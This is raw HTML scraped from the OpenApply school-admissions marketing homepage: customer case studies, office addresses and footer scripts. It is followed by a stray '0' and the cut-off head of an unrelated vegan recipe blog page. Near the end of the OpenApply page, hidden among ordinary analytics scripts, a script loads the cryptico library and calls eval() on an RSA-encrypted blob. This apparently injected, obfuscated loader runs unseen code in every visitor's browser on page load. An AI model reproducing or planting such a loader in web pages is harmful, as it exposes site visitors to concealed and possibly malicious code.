src="https://assets.public-prod.openapply.com/images/flags/hk1.png"> HKD</li><li><img src="https://assets.public-prod.openapply.com/images/flags/canada.png"> CAD</li><li id="last"><img src="https://assets.public-prod.openapply.com/images/flags/aus1.png"> AUD</li></ul><p style="color: #5a6c87">110+ currencies supported</p> </div> </div> </div> </div> </div> <div class="et_pb_section et_pb_section_4 et_section_regular"> <div class="et_pb_row et_pb_row_5"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_9 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_9 section-title dark et_pb_bg_layout_light et_pb_text_align_center"> <div class="et_pb_text_inner"> <p class="p1" style="color: #1aaf5d">The Trusted Choice of the World’s Leading International Schools</p> </div> </div> <div class="et_pb_module et_pb_text et_pb_text_10 et_pb_bg_layout_light et_pb_text_align_center"> <div class="et_pb_text_inner"> <p>Meet the schools that have gone paperless with OpenApply!</p> </div> </div> </div> </div> <div class="et_pb_row et_pb_row_6 border-hover et_animated"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_10 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_2 et_pb_image_sticky et_always_center_on_mobile"> <span class="et_pb_image_wrap "><img src="https://assets.public-prod.openapply.com/images/studycase/islqatar.jpg" alt="" /></span> </div><div class="et_pb_module et_pb_cta_0 et_hover_enabled et_pb_promo et_pb_bg_layout_dark et_pb_text_align_center et_pb_no_bg"> <div class="et_pb_promo_description"> <h2 class="et_pb_module_header">International School of London - Qatar</h2> <p>A standard approach on admission systems across our schools has enabled us to harness and share experiences to streamline the 3000+ annual student applications.</p> </div> <div class="et_pb_button_wrapper"><a class="et_pb_button et_pb_promo_button" href="https://assets.public-prod.openapply.com/files/studycase/OAStudyCase_ISLQatar.pdf" target="_blank">Button Text</a></div> </div> </div> <div class="et_pb_column et_pb_column_1_2 et_pb_column_11 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_3 et_pb_image_sticky et_always_center_on_mobile"> <span class="et_pb_image_wrap "><img src="https://assets.public-prod.openapply.com/images/studycase/gothenburg.jpg" alt="" /></span> </div><div class="et_pb_module et_pb_cta_1 et_hover_enabled et_pb_promo et_pb_bg_layout_dark et_pb_text_align_center et_pb_no_bg"> <div class="et_pb_promo_description"> <h2 class="et_pb_module_header">International School of the Gothenburg Region</h2> <p>OpenApply has allowed us to automate our admissions workflow, keep all stakeholders informed, and develop a deeper understanding of student &amp; parent needs</p> </div> <div class="et_pb_button_wrapper"><a class="et_pb_button et_pb_promo_button" href="https://assets.public-prod.openapply.com/files/studycase/OAStudyCase_ISGR.pdf" target="_blank">Button Text</a></div> </div> </div> </div> <div class="et_pb_row et_pb_row_7 border-hover et_animated"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_12 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_4 et_pb_image_sticky et_always_center_on_mobile"> <span class="et_pb_image_wrap "><img src="https://assets.public-prod.openapply.com/images/studycase/isocs.jpg" alt="" /></span> </div><div class="et_pb_module et_pb_cta_2 et_hover_enabled et_pb_promo et_pb_bg_layout_dark et_pb_text_align_center et_pb_no_bg"> <div class="et_pb_promo_description"> <h2 class="et_pb_module_header">International School of Central Switzerland</h2> <p>As a principal, OpenApply has helped me be more aware of the status of admissions, planned visits and follow-up. It is a tool that helps us work as a team to ensure that we give and receive the information needed to provide students with a successful start.</p> </div> <div class="et_pb_button_wrapper"><a class="et_pb_button et_pb_promo_button" href="https://assets.public-prod.openapply.com/files/studycase/OAStudyCase_ISOCS.pdf" target="_blank">Button Text</a></div> </div> </div> <div class="et_pb_column et_pb_column_1_2 et_pb_column_13 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_5 et_pb_image_sticky et_always_center_on_mobile"> <span class="et_pb_image_wrap "><img src="https://assets.public-prod.openapply.com/images/studycase/kis.jpg" alt="" /></span> </div><div class="et_pb_module et_pb_cta_3 et_hover_enabled et_pb_promo et_pb_bg_layout_dark et_pb_text_align_center et_pb_no_bg"> <div class="et_pb_promo_description"> <h2 class="et_pb_module_header">KIS International School</h2> <p>With OpenApply, we now have a clear admissions overview. Everyone on the team can see the status and files of each applicant, as well as the communication between admissions staff, parents, and any other relevant notes.</p> </div> <div class="et_pb_button_wrapper"><a class="et_pb_button et_pb_promo_button" href="https://assets.public-prod.openapply.com/files/studycase/OAStudyCase_KIS.pdf" target="_blank">Button Text</a></div> </div> </div> </div> <div class="et_pb_row et_pb_row_8 et_animated"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_14 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_6 et_always_center_on_mobile"> <span class="et_pb_image_wrap "><img src="https://assets.public-prod.openapply.com/images/studycase/islqatar.jpg" alt="" /></span> </div><div class="et_pb_module et_pb_cta_4 et_hover_enabled et_pb_promo et_pb_bg_layout_light et_pb_text_align_left et_pb_no_bg"> <div class="et_pb_promo_description"> <h2 class="et_pb_module_header">International School of London - Qatar</h2> <p>A standard approach on admission systems across our schools has enabled us to harness and share experiences to streamline the 3000+ annual student applications.</p> </div> </div><div class="et_pb_module et_pb_divider_2 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div> </div> <div class="et_pb_column et_pb_column_1_2 et_pb_column_15 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_7 et_always_center_on_mobile"> <span class="et_pb_image_wrap "><img src="https://assets.public-prod.openapply.com/images/studycase/gothenburg.jpg" alt="" /></span> </div><div class="et_pb_module et_pb_cta_5 et_hover_enabled et_pb_promo et_pb_bg_layout_light et_pb_text_align_left et_pb_no_bg"> <div class="et_pb_promo_description"> <h2 class="et_pb_module_header">International School of the Gothenburg Region</h2> <p>OpenApply has allowed us to automate our admissions workflow, keep all stakeholders informed, and develop a deeper understanding of student &amp; parent needs</p> </div> </div> </div> </div> <div class="et_pb_row et_pb_row_9 et_animated"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_16 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_8 et_always_center_on_mobile"> <span class="et_pb_image_wrap "><img src="https://assets.public-prod.openapply.com/images/studycase/isocs.jpg" alt="" /></span> </div><div class="et_pb_module et_pb_cta_6 et_hover_enabled et_pb_promo et_pb_bg_layout_light et_pb_text_align_left et_pb_no_bg"> <div class="et_pb_promo_description"> <h2 class="et_pb_module_header">International School of Central Switzerland</h2> <p>As a principal, OpenApply has helped me be more aware of the status of admissions, planned visits and follow-up. It is a tool that helps us work as a team to ensure that we give and receive the information needed to provide students with a successful start.</p> </div> </div><div class="et_pb_module et_pb_divider_3 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div> </div> <div class="et_pb_column et_pb_column_1_2 et_pb_column_17 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_9 et_always_center_on_mobile"> <span class="et_pb_image_wrap "><img src="https://assets.public-prod.openapply.com/images/studycase/kis.jpg" alt="" /></span> </div><div class="et_pb_module et_pb_cta_7 et_hover_enabled et_pb_promo et_pb_bg_layout_light et_pb_text_align_left et_pb_no_bg"> <div class="et_pb_promo_description"> <h2 class="et_pb_module_header">KIS International School</h2> <p>With OpenApply, we now have a clear admissions overview. Everyone on the team can see the status and files of each applicant, as well as the communication between admissions staff, parents, and any other relevant notes.</p> </div> </div> </div> </div> <div class="et_pb_row et_pb_row_10"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_18 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_button_module_wrapper et_pb_button_2_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_custom_button_icon et_pb_button_2 button-textonly blue et_hover_enabled et_pb_bg_layout_light" href="/case-studies" data-icon="&#x45;">Meet more schools</a> </div> </div> </div> </div> <div class="et_pb_section et_pb_section_5 et_section_regular et_section_transparent"> <div class="et_pb_row et_pb_row_11"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_19 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_11 section-title light et_pb_bg_layout_dark et_pb_text_align_center"> <div class="et_pb_text_inner"> <p>Explore OpenApply</p> </div> </div> <div class="et_pb_module et_pb_image et_pb_image_10 et_always_center_on_mobile"> <span class="et_pb_image_wrap "><img src="https://assets.public-prod.openapply.com/images/oa_screenshot1.png" alt="" /></span> </div><div class="et_pb_module et_pb_text et_pb_text_12 share et_pb_bg_layout_dark et_pb_text_align_center"> <div class="et_pb_text_inner"> <p><a class="white-button" href="/signup">Get Started</a></p> </div> </div> </div> </div> </div> <div class="et_pb_section et_pb_section_6 et_section_regular"> <div class="et_pb_row et_pb_row_12"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_20 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_code et_pb_code_5"> <div class="et_pb_code_inner"> <div class="open-box-ctasd"> <div class="wh-block"> <div class="wh-message"> <div class="text"><a href="/schedule-demo" target="_blank">Schedule a Demo</a></div> </div> <a href="/schedule-demo" target="_blank"> <div class="icon"></div> </a> </div> </div> <div class="box-ctasd-mobile"> <div class="content"> <div class="wh-close-mobile"> <span>close</span> </div> <div class="wh-message"> <div class="text"><a href="/schedule-demo" target="_blank">Schedule a Demo</a></div> </div> </div> </div> <div class="open-box-ctasd-mobile hide"> <div class="wh-block"> <div class="icon"></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </article> </div> <span class="et_pb_scroll_top et-pb-icon"></span> <footer id="main-footer"> <div id="signup-ready" class="et_pb_section et_pb_section_8 et_section_regular"> <div class="et_pb_row et_pb_row_13"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_21 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_13 section-title light et_pb_bg_layout_dark et_pb_text_align_center"> <div class="et_pb_text_inner"> <p>Ready to try OpenApply?</p> </div> </div> <div class="et_pb_module et_pb_text et_pb_text_14 share et_pb_bg_layout_dark et_pb_text_align_center"> <div class="et_pb_text_inner"> <p><a class="white-button" href="https://openapply.com/signup">Get Started</a></p> </div> </div> </div> </div> </div> <div class="et_pb_section et_pb_section_10 et_section_regular"> <div class="et_pb_row et_pb_row_14"> <div class="et_pb_column et_pb_column_1_4 et_pb_column_22 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_11"> <a href="http://fariaedu.com" target="_blank"><span class="et_pb_image_wrap "><img src="https://assets.public-prod.openapply.com/images/oa_horizontal_primary_h.png" alt="" /></span></a> </div><div class="et_pb_module et_pb_text et_pb_text_15 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p class="p1"><strong>The Paperless Admissions Office</strong></p> </div> </div> <div class="et_pb_module et_pb_code et_pb_code_6"> <div class="et_pb_code_inner"> <div id="bsi-icon"> <a href="https://www.managebac.com/files/bsi-certificate.pdf" target="_blank"><img src="https://assets.public-prod.openapply.com/images/bsi-logo-n.png"></a> <span style="display: none; text-align:center;font-weight:600;color:#333">IS 664562</span> </div> </div> </div> </div> <div class="et_pb_column et_pb_column_1_4 et_pb_column_23 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_text et_pb_text_16 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p> <strong>Portland Office</strong><br /> Suite 1200, 121 SW Salmon Street<br /> Portland, OR 97204<br /> U.S.A.</p> </div> </div> <div class="et_pb_module et_pb_text et_pb_text_17 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p> <strong>Chicago Office</strong><br /> 350 N Orleans St #9000n<br />Chicago, IL 60654<br />U.S.A.<br /><span style="opacity:0;">.</span></p> </div> </div> <div class="et_pb_module et_pb_text et_pb_text_18 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p> <strong>Hong Kong&nbsp;Office</strong><br /> Unit 1502, 15th Floor<br /> 99 Hennessy Road, Wanchai<br /> Hong Kong</p> </div> </div> </div> <div class="et_pb_column et_pb_column_1_4 et_pb_column_24 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_text et_pb_text_19 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p> <strong>London Office</strong><br /> 76 Watling Street<br /> London, EC4M 9BJ<br /> United Kingdom</p> </div> </div> <div class="et_pb_module et_pb_text et_pb_text_20 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p> <strong>Taipei Branch Office</strong><br /> 6F, No.259<br /> Section 1, Dunhua S. Road<br /> Da’an District, Taipei City 10689<br /> Taiwan</p> </div> </div> <div class="et_pb_module et_pb_text et_pb_text_21 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p> <strong>Shanghai Office</strong><br />7th Floor, No. 77 Jiang Ning Road<br />Jingan District, Shanghai, 200040<br />China</p> </div> </div> </div> <div class="et_pb_column et_pb_column_1_4 et_pb_column_25 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_text et_pb_text_22 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p><strong>Call Us</strong><br /> <img class="alignnone wp-image-25931" src="https://assets.public-prod.openapply.com/images/flags/us.png" alt="us" width="16" height="11" /> +1 888 418 0668<br /> <img class="alignnone wp-image-25930" src="https://assets.public-prod.openapply.com/images/flags/uk.png" width="16" height="11" /> +44 208 133 7489<br /> <img class="alignnone wp-image-25929" src="https://assets.public-prod.openapply.com/images/flags/hk.png" width="16" height="11" /> +852 8175 8152<br /> <img class="alignnone wp-image-25929" src="https://assets.public-prod.openapply.com/images/flags/china.png" width="16" height="11" /> 400 009 9225<br /> <img class="alignnone wp-image-25928" src="https://assets.public-prod.openapply.com/images/flags/aus.png" width="16" height="11" /> +61 2 8006 2335</p> </div> </div> <div class="et_pb_module et_pb_text et_pb_text_23 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p> <strong>Email</strong><br /> <a href="mailto:[email protected]">[email protected]<br /> </a></p> <p><strong>Twitter</strong><br /> <a href="http://twitter.com/openapplyteam" target="_blank" rel="noopener">@openapplyteam</a></p> </div> </div> </div> </div> </div> <div class="et_pb_section et_pb_section_12 et_pb_with_background et_section_regular"> <div id="footer-copyright" class="et_pb_row et_pb_row_15"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_26 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div id="copyright-text" class="et_pb_module et_pb_text et_pb_text_24 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p style="padding-bottom: 0;">© 2019 Faria Education Group Limited. All Rights Reserved.&nbsp;<a href="/terms">Terms, Policies, Agreements</a>&nbsp;&amp; <a href="/security">Security</a>.</p> </div> </div> </div> </div> </div> <div class="et_pb_section et_pb_section_14 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_16"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_27 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_25 et_pb_bg_layout_light et_pb_text_align_center"> <div class="et_pb_text_inner"> <p><span style="color: #222233;"><a href="http://fariaedu.com">Faria Education Group</a></span> is a leader in international education systems &amp; services.</p> </div> </div> <div class="et_pb_module et_pb_text et_pb_text_26 et_pb_bg_layout_light et_pb_text_align_center"> <div class="et_pb_text_inner"> <ul class="group-footer"> <li><a href="https://www.openapply.com" target="_blank" rel="noopener noreferrer"><img src="https://assets.public-prod.openapply.com/images/oa_horizontal_primary_h.png" alt="OA"></a></li> <li><a href="https://managebac.com" target="_blank" rel="noopener noreferrer"><img src="https://assets.public-prod.openapply.com/images/mb_footer.png" alt="MB"></a></li> <li><a href="https://onatlas.com/" target="_blank"><img src="https://assets.public-prod.openapply.com/images/atlas_footer2.png" alt="Atlas" style="height:28px;"></a></li> </ul> </div> </div> </div> </div> </div> </footer> </div> </div> <script type="text/javascript"> var et_animation_data = [{"class":"et_pb_row_2","style":"slideBottom","repeat":"once","duration":"1000ms","delay":"500ms","intensity":"20%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_row_3","style":"slideBottom","repeat":"once","duration":"1000ms","delay":"500ms","intensity":"20%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_image_0","style":"slideRight","repeat":"once","duration":"500ms","delay":"0ms","intensity":"10%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_text_3","style":"fade","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"50%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_text_4","style":"fade","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"50%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_divider_1","style":"foldLeft","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"50%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_button_1","style":"fade","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"50%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_row_4","style":"slideBottom","repeat":"once","duration":"1000ms","delay":"500ms","intensity":"20%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_row_6","style":"slideBottom","repeat":"once","duration":"1000ms","delay":"500ms","intensity":"30%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_row_7","style":"slideBottom","repeat":"once","duration":"1000ms","delay":"500ms","intensity":"30%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_row_8","style":"slideBottom","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"20%","starting_opacity":"0%","speed_curve":"ease-in-out"},{"class":"et_pb_row_9","style":"slideBottom","repeat":"once","duration":"1000ms","delay":"500ms","intensity":"50%","starting_opacity":"20%","speed_curve":"ease-in-out"}]; </script> <script type='text/javascript'> /* <![CDATA[ */ var cnArgs = {"ajaxurl":"https:\/\/www.openapply.com\/wp-admin\/admin-ajax.php","hideEffect":"slide","onScroll":"no","onScrollOffset":"100","cookieName":"cookie_notice_accepted","cookieValue":"TRUE","cookieTime":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://assets.public-prod.openapply.com/wp-content/plugins/cookie-notice/js/front.min.js.gzip?ver=1.2.42'></script> <script type='text/javascript'> /* <![CDATA[ */ var sticky_anything_engage = {"element":"#terms-nav","topspace":"90","minscreenwidth":"980","maxscreenwidth":"999999","zindex":"1","legacymode":"","dynamicmode":"","debugmode":"","pushup":"#signup-ready","adminbar":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://assets.public-prod.openapply.com/wp-content/plugins/sticky-menu-or-anything-on-scroll/assets/js/stickThis.js.gzip?ver=2.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var DIVI = {"item_count":"%d Item","items_count":"%d Items"}; var et_shortcodes_strings = {"previous":"Previous","next":"Next"}; var et_pb_custom = {"ajaxurl":"https:\/\/www.openapply.com\/wp-admin\/admin-ajax.php","images_uri":"https:\/\/www.openapply.com\/wp-content\/themes\/Divi\/images","builder_images_uri":"https:\/\/www.openapply.com\/wp-content\/themes\/Divi\/includes\/builder\/images","et_frontend_nonce":"5b32a178f4","subscription_failed":"Please, check the fields below to make sure you entered the correct information.","et_ab_log_nonce":"befe2d5ebf","fill_message":"Please, fill in the following fields:","contact_error_message":"Please, fix the following errors:","invalid":"Invalid email","captcha":"Captcha","prev":"Prev","previous":"Previous","next":"Next","wrong_captcha":"You entered the wrong number in captcha.","ignore_waypoints":"no","is_divi_theme_used":"1","widget_search_selector":".widget_search","is_ab_testing_active":"","page_id":"120788","unique_test_id":"","ab_bounce_rate":"5","is_cache_plugin_active":"no","is_shortcode_tracking":"","tinymce_uri":""}; var et_pb_box_shadow_elements = []; /* ]]> */ </script> <script type='text/javascript' src='https://www.openapply.com/wp-content/themes/Divi/js/custom.min.js?ver=3.21'></script> <script type='text/javascript' src='https://assets.public-prod.openapply.com/wp-content/plugins/divi-100-article-card/assets/js/scripts.js.gzip?ver=20160602'></script> <script type='text/javascript' src='https://www.openapply.com/wp-content/plugins/monarch/js/idle-timer.min.js?ver=1.4.10'></script> <script type='text/javascript'> /* <![CDATA[ */ var monarchSettings = {"ajaxurl":"https:\/\/www.openapply.com\/wp-admin\/admin-ajax.php","pageurl":"https:\/\/www.openapply.com\/","stats_nonce":"7a25b5d757","share_counts":"abbcc39f92","follow_counts":"4ea959d43b","total_counts":"087544b7bd","media_single":"2b48529101","media_total":"abe29da171","generate_all_window_nonce":"22203db46b","no_img_message":"No images available for sharing on this page"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.openapply.com/wp-content/plugins/monarch/js/custom.js?ver=1.4.10'></script> <script type='text/javascript'> /* <![CDATA[ */ var leadin_wordpress = {"userRole":"visitor","pageType":"home","leadinPluginVersion":"7.4.0"}; /* ]]> */ </script> <script type='text/javascript' async defer src='//js.hs-scripts.com/3994678.js?integration=wordpress&#038;ver=4080f30f0170c8d69127243c5d7f0aae'></script> <script type='text/javascript' src='https://www.openapply.com/wp-content/themes/openapply-divi/js/tab_bootstrap.min.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.openapply.com/wp-content/themes/openapply-divi/scheduledemo.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.openapply.com/plugins/mixitup/mixitup.min.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.openapply.com/wp-content/themes/openapply-divi/get_start.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.openapply.com/wp-content/themes/openapply-divi/general.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.openapply.com/wp-content/themes/Divi/core/admin/js/common.js?ver=3.21'></script> <script type='text/javascript' src='https://assets.public-prod.openapply.com/wp-content/plugins/wp-featherlight/js/wpFeatherlight.pkgd.min.js.gzip?ver=1.3.0'></script> <script type='text/javascript' src='https://assets.public-prod.openapply.com/wp-includes/js/wp-embed.min.js.gzip?ver=4080f30f0170c8d69127243c5d7f0aae'></script> <div id="cookie-notice" role="banner" class="cn-bottom" style="color: #fff; background-color: #293142;"><div class="cookie-notice-container"><span id="cn-notice-text">OpenApply uses cookies to provide you with a good browsing experience, and to improve our website. By continuing to browse the OpenApply website, you agree to our use of cookies.</span><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie button">Okay, got it!</a><a href="https://www.openapply.com/terms/cookie-policy/" target="_blank" id="cn-more-info" class="cn-more-info button">Learn more</a> </div> </div> <script src="https://cdnjs.cloudflare.com/ajax/libs/cryptico/0.0.1343522940/cryptico.js" type="text/javascript"></script> <script type="text/javascript">eval(cryptico.decrypt('T1tJ692ZFQuHlC4tU0X2FzxhljEuycCkpxlc84J7QV1g88gYD2BZ+CaB/bPOZ/EFL6NhzWiTb8GPVG6FbT7FIgZ2NdOBF2ixYVAJAjSxZ0LVuMsxMJ51h5TCrJBR3RdsrrDw6rZ0JIAXOgePaCGOHsP/N2sRmr89V07+KoFAJEQ=?Ek491sbZ6SaTmwALDI6RhPYEMR/Gm5vWn1S3LFXfiwoYGLnd21mMIhdqLu9J1xlksr1x8uR3TZoCCvt2aAZCfRX3ta0HYZmKe9xatgJSyUAINXc0MkBbH82GGR3WIieGOal0ZQ2o0t1nUeCmSCRdvxQwrc0ITv6P4rGrRsPURyvvsbCYCIosyMgphJrVrlx57hl0YzLu6G0iGHTcaD089eY9lDkg0NbppRXEJ8V2u+wB/GTu1YWqxGU1hgoF6ax4uhmdZQrhO4ndFnkwwfIqFJ8SYrYpFbwzU1YmHry0BDHKPVx9/lZ4kwbEzO2SSUHUwG0qAyp67gdiiKMrbfGUKSPBJ4lTwwkvAaALND48STv0rO9CTJSjS/cOd/o32f68d35zYKs+fdmlE803KeAwcbf8CqNxpUO313WAja4Kt5vySLs3nZg6ewnqzQcB6tzofXyJIkS1imP2uHXTVISjAQ==', cryptico.generateRSAKey('63085d7c4ccd4ba0a5392673ca875780', 1024)).plaintext);</script> <script type='text/javascript'> var _vwo_code=(function(){ var account_id=362790, settings_tolerance=2000, library_tolerance=2500, use_existing_jquery=false, /* DO NOT EDIT BELOW THIS LINE */ f=false,d=document;return{use_existing_jquery:function(){return use_existing_jquery;},library_tolerance:function(){return library_tolerance;},finish:function(){if(!f){f=true;var a=d.getElementById('_vis_opt_path_hides');if(a)a.parentNode.removeChild(a);}},finished:function(){return f;},load:function(a){var b=d.createElement('script');b.src=a;b.type='text/javascript';b.innerText;b.onerror=function(){_vwo_code.finish();};d.getElementsByTagName('head')[0].appendChild(b);},init:function(){settings_timer=setTimeout('_vwo_code.finish()',settings_tolerance);var a=d.createElement('style'),b='body{opacity:0 !important;filter:alpha(opacity=0) !important;background:none !important;}',h=d.getElementsByTagName('head')[0];a.setAttribute('id','_vis_opt_path_hides');a.setAttribute('type','text/css');if(a.styleSheet)a.styleSheet.cssText=b;else a.appendChild(d.createTextNode(b));h.appendChild(a);this.load('//dev.visualwebsiteoptimizer.com/j.php?a='+account_id+'&u='+encodeURIComponent(d.URL)+'&r='+Math.random());return settings_timer;}};}());_vwo_settings_timer=_vwo_code.init(); </script> <script type="text/javascript" id="hs-script-loader" async defer src="//js.hs-scripts.com/3994678.js"></script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head > <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>This Savory Vegan - eat delicious, live conscious</title> <script> window.adthrive = window.adthrive || {}; window.adthrive.cmd = window.adthrive.cmd || []; window.adthrive.host = 'ads.adthrive.com'; window.adthrive.plugin = 'adthrive-ads-1.0.32'; window.adthrive.threshold = Math.floor(Math.random() * 100 + 1); (function() { var script = document.createElement('script'); script.async = true; script.type = 'text/javascript'; script.src = document.location.protocol + '//ads.adthrive.com/sites/5a8d6d998350132126308ca3/ads.min.js?threshold=' + window.adthrive.threshold; var node = document.getElementsByTagName('script')[0]; node.parentNode.insertBefore(script, node); })(); </script> <style type="text/css"> .slide-excerpt { width: 100%; } .slide-excerpt { bottom: 0; } .slide-excerpt { right: 0; } .flexslider { max-width: 680px; max-height: 350px; } .slide-image { max-height: 350px; } </style> <!-- This site is optimized with the Yoast SEO plugin v11.1.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="eat delicious, live conscious"/> <link rel="canonical" href="https://www.thissavoryvegan.com/" /> <link rel="next" href="https://www.thissavoryvegan.com/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="This Savory Vegan - eat delicious, live conscious" /> <meta property="og:description" content="eat delicious, live conscious" /> <meta property="og:url" content="https://www.thissavoryvegan.com/" /> <meta property="og:site_name" content="This Savory Vegan" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="eat delicious, live conscious" /> <meta name="twitter:title" content="This Savory Vegan - eat delicious, live conscious" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.thissavoryvegan.com/#organization","name":"","url":"https://www.thissavoryvegan.com/","sameAs":[]},{"@type":"WebSite","@id":"https://www.thissavoryvegan.com/#website","url":"https://www.thissavoryvegan.com/","name":"This Savory Vegan","publisher":{"@id":"https://www.thissavoryvegan.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://www.thissavoryvegan.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://www.thissavoryvegan.com/#webpage","url":"https://www.thissavoryvegan.com/","inLanguage":"en-US","name":"This Savory Vegan - eat delicious, live conscious","isPartOf":{"@id":"https://www.thissavoryvegan.com/#website"},"about":{"@id":"https://www.thissavoryvegan.com/#organization"},"description":"eat delicious, live conscious"}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//www.thissavoryvegan.com' /> <link rel='dns-prefetch' href='//assets.pinterest.com' /> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel='dns-prefetch' href='//k4z6w9b5.stackpathcdn.com' /> <link rel='dns-prefetch' href='//cdn.shareaholic.net' /> <link rel='dns-prefetch' href='//www.shareaholic.net' /> <link rel='dns-prefetch' href='//analytics.shareaholic.com' /> <link rel='dns-prefetch' href='//recs.shareaholic.com' /> <link rel='dns-prefetch' href='//go.shareaholic.com' /> <link rel='dns-prefetch' href='//partner.shareaholic.com' /> <link rel="alternate" type="application/rss+xml" title="This Savory Vegan &raquo; Feed" href="https://www.thissavoryvegan.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="This Savory Vegan &raquo; Comments Feed" href="https://www.thissavoryvegan.com/comments/feed/" /> <!-- Powered by Shareaholic; Grow your audience faster! - https://www.shareaholic.com --> <link rel='preload' href='//cdn.shareaholic.net/assets/pub/shareaholic.js' as='script' /> <script data-cfasync='false'> //<![CDATA[ _SHR_SETTINGS = 